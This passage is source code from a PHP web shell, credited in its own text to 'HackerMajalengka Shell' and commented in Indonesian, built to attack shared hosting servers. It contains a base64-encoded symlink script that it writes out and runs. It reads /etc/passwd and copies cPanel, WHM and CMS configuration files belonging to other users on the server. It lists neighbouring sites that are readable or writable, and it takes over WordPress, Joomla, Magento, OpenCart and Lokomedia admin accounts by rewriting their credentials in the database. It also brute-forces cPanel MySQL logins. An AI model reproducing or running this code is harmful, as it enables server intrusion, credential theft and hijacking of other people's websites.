kb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
  1884. $file = "mct_config/vhost.cin";
  1885. $handle = fopen($file ,"w+");
  1886. fwrite($handle ,base64_decode($vhost));
  1887. fclose($handle);
  1888. chmod($file, 0755);
  1889. if(exe("cd mct_config && ./vhost.cin")) {
  1890. echo "<center><a href='$link_config/mct_config'><font color=cyan>Done</font></a></center>";
  1891. } else {
  1892. echo "<center><a href='$link_config/mct_config/vhost.cin'><font color=cyan>Done</font></a></center>";
  1893. }
  1894.  
  1895. } else {
  1896. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1897. while($passwd = fgets($etc)) {
  1898. if($passwd == "" || !$etc) {
  1899. echo "<font color=red>Can't read /etc/passwd</font>";
  1900. } else {
  1901. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1902. foreach($user_config[1] as $user_human) {
  1903. $user_config_dir = "/home/$user_human/public_html/";
  1904. if(is_readable($user_config_dir)) {
  1905. $grab_config = array(
  1906. "/home/$user_human/.my.cnf" => "cpanel",
  1907. "/home/$user_human/.accesshash" => "WHM-accesshash",
  1908. "$user_config_dir/po-content/config.php" => "Popoji",
  1909. "$user_config_dir/vdo_config.php" => "Voodoo",
  1910. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  1911. "$user_config_dir/config/koneksi.php" => "Lokomedia",
  1912. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  1913. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  1914. "$user_config_dir/whm/configuration.php" => "WHMCS",
  1915. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  1916. "$user_config_dir/forum/config.php" => "phpBB",
  1917. "$user_config_dir/sites/default/settings.php" => "Drupal",
  1918. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  1919. "$user_config_dir/app/etc/local.xml" => "Magento",
  1920. "$user_config_dir/joomla/configuration.php" => "Joomla",
  1921. "$user_config_dir/configuration.php" => "Joomla",
  1922. "$user_config_dir/wp/wp-config.php" => "WordPress",
  1923. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  1924. "$user_config_dir/wp-config.php" => "WordPress",
  1925. "$user_config_dir/admin/config.php" => "OpenCart",
  1926. "$user_config_dir/slconfig.php" => "Sitelok",
  1927. "$user_config_dir/application/config/database.php" => "Ellislab");
  1928. foreach($grab_config as $config => $nama_config) {
  1929. $ambil_config = file_get_contents($config);
  1930. if($ambil_config == '') {
  1931. } else {
  1932. $file_config = fopen("mct_config/$user_human-$nama_config.txt","w");
  1933. fputs($file_config,$ambil_config);
  1934. }
  1935. }
  1936. }
  1937. }
  1938. }
  1939. }
  1940. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  1941. echo "<center><a href='?dir=$dir/mct_config'><font color=cyan>Done</font></a></center></div>";
  1942. }
  1943. } elseif($_GET['do'] == 'jumping') {
  1944. $i = 0;
  1945. echo "<div class='margin: 5px auto;'>";
  1946. if(preg_match("/hsphere/", $dir)) {
  1947. $urls = explode("\r\n", $_POST['url']);
  1948. if(isset($_POST['jump'])) {
  1949. echo "<pre>";
  1950. foreach($urls as $url) {
  1951. $url = str_replace(array("https://","www."), "", strtolower($url));
  1952. $etc = "/etc/passwd";
  1953. $f = fopen($etc,"r");
  1954. while($gets = fgets($f)) {
  1955. $pecah = explode(":", $gets);
  1956. $user = $pecah[0];
  1957. $dir_user = "/hsphere/local/home/$user";
  1958. if(is_dir($dir_user) === true) {
  1959. $url_user = $dir_user."/".$url;
  1960. if(is_readable($url_user)) {
  1961. $i++;
  1962. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1963. if(is_writable($url_user)) {
  1964. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1965. }
  1966. echo $jrw."<br>";
  1967. }
  1968. }
  1969. }
  1970. }
  1971. if($i == 0) {
  1972. } else {
  1973. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1974. }
  1975. echo "</pre>";
  1976. } else {
  1977. echo '<center>
  1978. <form method="post">
  1979. List Domains: <br>
  1980. <textarea name="url" style="width: 500px; height: 250px;">';
  1981. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1982. while($getss = fgets($fp)) {
  1983. echo $getss;
  1984. }
  1985. echo '</textarea><br>
  1986. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1987. </form></center>';
  1988. }
  1989. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  1990. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  1991. $urls = explode("\r\n", $_POST['url']);
  1992. if(isset($_POST['jump'])) {
  1993. echo "<pre>";
  1994. foreach($urls as $url) {
  1995. $url = str_replace("www.", "", $url);
  1996. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  1997. if(is_dir($web_vh) === true) {
  1998. if(is_readable($web_vh)) {
  1999. $i++;
  2000. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  2001. if(is_writable($web_vh)) {
  2002. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  2003. }
  2004. echo $jrw."<br>";
  2005. }
  2006. }
  2007. }
  2008. if($i == 0) {
  2009. } else {
  2010. echo "<br>Total ada ".$i." Kamar di ".$ip;
  2011. }
  2012. echo "</pre>";
  2013. } else {
  2014. echo '<center>
  2015. <form method="post">
  2016. List Domains: <br>
  2017. <textarea name="url" style="width: 500px; height: 250px;">';
  2018. bing("ip:$ip");
  2019. echo '</textarea><br>
  2020. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  2021. </form></center>';
  2022. }
  2023. } else {
  2024. echo "<pre>";
  2025. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  2026. while($passwd = fgets($etc)) {
  2027. if($passwd == '' || !$etc) {
  2028. echo "<font color=red>Can't read /etc/passwd</font>";
  2029. } else {
  2030. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2031. foreach($user_jumping[1] as $user_human_jump) {
  2032. $user_jumping_dir = "/home/$user_human_jump/public_html";
  2033. if(is_readable($user_jumping_dir)) {
  2034. $i++;
  2035. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2036. if(is_writable($user_jumping_dir)) {
  2037. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2038. }
  2039. echo $jrw;
  2040. if(function_exists('posix_getpwuid')) {
  2041. $domain_jump = file_get_contents("/etc/named.conf");
  2042. if($domain_jump == '') {
  2043. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2044. } else {
  2045. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2046. foreach($domains_jump[1] as $dj) {
  2047. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2048. $user_jumping_url = $user_jumping_url['name'];
  2049. if($user_jumping_url == $user_human_jump) {
  2050. echo " => ( <u>$dj</u> )<br>";
  2051. break;
  2052. }
  2053. }
  2054. }
  2055. } else {
  2056. echo "<br>";
  2057. }
  2058. }
  2059. }
  2060. }
  2061. }
  2062. if($i == 0) {
  2063. } else {
  2064. echo "<br>Total ada ".$i." Kamar di ".$ip;
  2065. }
  2066. echo "</pre>";
  2067. }
  2068. echo "</div>";
  2069. } elseif($_GET['do'] == 'auto_edit_user') {
  2070. if($_POST['hajar']) {
  2071. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2072. echo "username atau password harus lebih dari 6 karakter";
  2073. } else {
  2074. $user_baru = $_POST['user_baru'];
  2075. $pass_baru = md5($_POST['pass_baru']);
  2076. $conf = $_POST['config_dir'];
  2077. $scan_conf = scandir($conf);
  2078. foreach($scan_conf as $file_conf) {
  2079. if(!is_file("$conf/$file_conf")) continue;
  2080. $config = file_get_contents("$conf/$file_conf");
  2081. if(preg_match("/JConfig|joomla/",$config)) {
  2082. $dbhost = ambilkata($config,"host = '","'");
  2083. $dbuser = ambilkata($config,"user = '","'");
  2084. $dbpass = ambilkata($config,"password = '","'");
  2085. $dbname = ambilkata($config,"db = '","'");
  2086. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2087. $prefix = $dbprefix."users";
  2088. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2089. $db = mysql_select_db($dbname);
  2090. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2091. $result = mysql_fetch_array($q);
  2092. $id = $result['id'];
  2093. $site = ambilkata($config,"sitename = '","'");
  2094. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2095. echo "Config => ".$file_conf."<br>";
  2096. echo "CMS => Joomla<br>";
  2097. if($site == '') {
  2098.  
  2099. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2100. } else {
  2101. echo "Sitename => $site<br>";
  2102. }
  2103. if(!$update OR !$conn OR !$db) {
  2104. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2105. } else {
  2106. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2107. }
  2108. mysql_close($conn);
  2109. } elseif(preg_match("/WordPress/",$config)) {
  2110. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2111. $dbuser = ambilkata($config,"DB_USER', '","'");
  2112. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2113. $dbname = ambilkata($config,"DB_NAME', '","'");
  2114. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2115. $prefix = $dbprefix."users";
  2116. $option = $dbprefix."options";
  2117. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2118. $db = mysql_select_db($dbname);
  2119. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2120. $result = mysql_fetch_array($q);
  2121. $id = $result[ID];
  2122. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2123. $result2 = mysql_fetch_array($q2);
  2124. $target = $result2[option_value];
  2125. if($target == '') {
  2126. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2127. } else {
  2128. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2129. }
  2130. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2131. echo "Config => ".$file_conf."<br>";
  2132. echo "CMS => Wordpress<br>";
  2133. echo $url_target;
  2134. if(!$update OR !$conn OR !$db) {
  2135. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2136. } else {
  2137. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2138. }
  2139. mysql_close($conn);
  2140. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2141. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2142. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2143. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2144. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2145. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2146. $prefix = $dbprefix."admin_user";
  2147. $option = $dbprefix."core_config_data";
  2148. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2149. $db = mysql_select_db($dbname);
  2150. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2151. $result = mysql_fetch_array($q);
  2152. $id = $result[user_id];
  2153. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2154. $result2 = mysql_fetch_array($q2);
  2155. $target = $result2[value];
  2156. if($target == '') {
  2157. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2158. } else {
  2159. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2160. }
  2161. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2162. echo "Config => ".$file_conf."<br>";
  2163. echo "CMS => Magento<br>";
  2164. echo $url_target;
  2165. if(!$update OR !$conn OR !$db) {
  2166. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2167. } else {
  2168. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2169. }
  2170. mysql_close($conn);
  2171. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2172. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2173. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2174. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2175. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2176. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2177. $prefix = $dbprefix."user";
  2178. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2179. $db = mysql_select_db($dbname);
  2180. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2181. $result = mysql_fetch_array($q);
  2182. $id = $result[user_id];
  2183. $target = ambilkata($config,"HTTP_SERVER', '","'");
  2184. if($target == '') {
  2185. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2186. } else {
  2187. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2188. }
  2189. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2190. echo "Config => ".$file_conf."<br>";
  2191. echo "CMS => OpenCart<br>";
  2192. echo $url_target;
  2193. if(!$update OR !$conn OR !$db) {
  2194. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2195. } else {
  2196. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2197. }
  2198. mysql_close($conn);
  2199. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2200. $dbhost = ambilkata($config,'server = "','"');
  2201. $dbuser = ambilkata($config,'username = "','"');
  2202. $dbpass = ambilkata($config,'password = "','"');
  2203. $dbname = ambilkata($config,'database = "','"');
  2204. $prefix = "users";
  2205. $option = "identitas";
  2206. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2207. $db = mysql_select_db($dbname);
  2208. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2209. $result = mysql_fetch_array($q);
  2210. $target = $result[alamat_website];
  2211. if($target == '') {
  2212. $target2 = $result[url];
  2213. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2214. if($target2 == '') {
  2215. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2216. } else {
  2217. $cek_login3 = file_get_contents("$target2/adminweb/");
  2218. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2219. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2220. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2221. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2222. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2223. } else {
  2224. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2225. }
  2226. }
  2227. } else {
  2228. $cek_login = file_get_contents("$target/adminweb/");
  2229. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2230. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2231. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2232. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2233. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2234. } else {
  2235. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2236. }
  2237. }
  2238. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2239. echo "Config => ".$file_conf."<br>";
  2240. echo "CMS => Lokomedia<br>";
  2241. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2242. echo $url_target2;
  2243. } else {
  2244. echo $url_target;
  2245. }
  2246. if(!$update OR !$conn OR !$db) {
  2247. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2248. } else {
  2249. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2250. }
  2251. mysql_close($conn);
  2252. }
  2253. }
  2254. }
  2255. } else {
  2256. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Auto Edit User Config [+]</div>";
  2257. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2258. echo "<center>
  2259. <form method='post'>
  2260. DIR Config: <br>
  2261. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2262. Set User & Pass: <br>
  2263. <input type='text' name='user_baru' value='restutamvan' placeholder='user_baru'><br>
  2264. <input type='text' name='pass_baru' value='restutamvan' placeholder='pass_baru'><br>
  2265. <input type='submit' name='hajar' value='Submit' style='width: 215px;'>
  2266. </form>
  2267. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2268. ";
  2269. }
  2270.  
  2271. } elseif($_GET['do'] == 'cpanel') {
  2272. if($_POST['crack']) {
  2273. $usercp = explode("\r\n", $_POST['user_cp']);
  2274. $passcp = explode("\r\n", $_POST['pass_cp']);
  2275. $i = 0;
  2276. foreach($usercp as $ucp) {
  2277. foreach($passcp as $pcp) {
  2278. if(@mysql_connect('localhost', $ucp, $pcp)) {
  2279. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2280. } else {
  2281. $_SESSION[$ucp] = "1";
  2282. $_SESSION[$pcp] = "1";
  2283. if($ucp == '' || $pcp == '') {
  2284.  
  2285. } else {
  2286. $i++;
  2287. if(function_exists('posix_getpwuid')) {
  2288. $domain_cp = file_get_contents("/etc/named.conf");
  2289. if($domain_cp == '') {
  2290. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  2291. } else {
  2292. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2293. foreach($domains_cp[1] as $dj) {
  2294. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2295. $user_cp_url = $user_cp_url['name'];
  2296. if($user_cp_url == $ucp) {
  2297. $dom = "<a href='https://$dj/' target='_blank'><font color=cyan>$dj</font></a>";
  2298. break;
  2299. }
  2300. }
  2301. }
  2302. } else {
  2303. $dom = "<font color=red>function is Disable by system</font>";
  2304. }
  2305. echo "username (<font color=cyan>$ucp</font>) password (<font color=cyan>$pcp</font>) domain ($dom)<br>";
  2306. }
  2307. }
  2308. }
  2309. }
  2310. }
  2311. if($i == 0) {
  2312. } else {
  2313. echo "<br>sukses nyolong ".$i." Cpanel by <font color=cyan>HackerMajalengka Shell.</font>";
  2314. }
  2315. } else {
  2316. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] cPanel Crack [+]</div>";
  2317. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2318. echo "<form method='post'>
  2319. USER: <br>
  2320. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2321. $_usercp = fopen("/etc/passwd","r");
  2322. while($getu = fgets($_usercp)) {
  2323. if($getu == '' || !$_usercp) {
  2324. echo "<font color=red>Can't read /etc/passwd</font>";
  2325. } else {
  2326. preg_match_all("/(.*?):x:/", $getu, $u);
  2327. foreach($u[1] as $user_cp) {
  2328. if(is_dir("/home/$user_cp/public_html")) {
  2329. echo "$user_cp\n";
  2330. }
  2331. }
  2332. }
  2333. }
  2334. echo "</textarea><br>
